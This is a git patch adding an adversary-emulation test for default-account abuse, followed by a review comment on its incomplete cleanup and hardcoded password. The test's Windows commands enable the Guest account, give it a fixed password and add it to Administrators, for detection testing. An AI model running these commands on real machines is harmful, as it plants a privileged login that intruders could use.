From 5a67b430217bb2a8623a84a497f9bbdaa21880eb Mon Sep 17 00:00:00 2001
From: Jesse Moore
Date: Thu, 6 Aug 2020 08:49:27 -0600
Subject: [PATCH] Create T1078.001 and yaml (#1178)

* Create T1078.001 and yaml Creating Folder for sub technique and yaml for .001
* Update T1078.001.yaml
* Update T1078.001.yaml
Co-authored-by: Carrie Roberts
---
atomics/T1078.001/T1078.001.yaml | 17 +++++++++++++++++
1 file changed, 17 insertions(+)
create mode 100644 atomics/T1078.001/T1078.001.yaml
diff --git a/atomics/T1078.001/T1078.001.yaml b/atomics/T1078.001/T1078.001.yaml
new file mode 100644
index 00000000..c8813e44
--- /dev/null
+++ b/atomics/T1078.001/T1078.001.yaml
@@ -0,0 +1,17 @@
+attack_technique: T1078.001
+display_name: 'Valid Accounts: Default Accounts'
+atomic_tests:
+- name: Enable Guest account
+ description: After execution the Default Guest account will be enabled (Active) and added to Administrators Group
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ net user guest /active:yes
+ net user guest Paswword123!
+ net localgroup administrators guest /add
+ cleanup_command: |-
+ net user guest /active:no
+ net localgroup administrators guest /delete
+ name: command_prompt
+ elevation_required: true
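Review bot: The `cleanup_command` block never undoes the `net user guest Paswword123!` step, so after cleanup the host keeps a disabled Guest account whose password is a literal published in this file; the `description` also mentions only the enable and the Administrators membership, not the password change. I would move the password into an input argument, change the command line to `net user guest #{guest_password}`, and have the description state that the password is changed and is not restored by cleanup. The literal also looks like a misspelling of "Password123!", which a documented argument default would make moot. Cleanup also disables Guest unconditionally, so a host where the account was already enabled before the test (presumably rare) does not return to its prior state.

```yaml
  # … unchanged: name, description, supported_platforms …
  input_arguments:
    guest_password:
      description: Password set on the Guest account while the test runs (not restored by cleanup)
      type: String
      # constructed placeholder; override per test environment
      default: 'ReplaceMe-Placeholder1!'
  # … unchanged: executor (command, cleanup_command, name, elevation_required) …
```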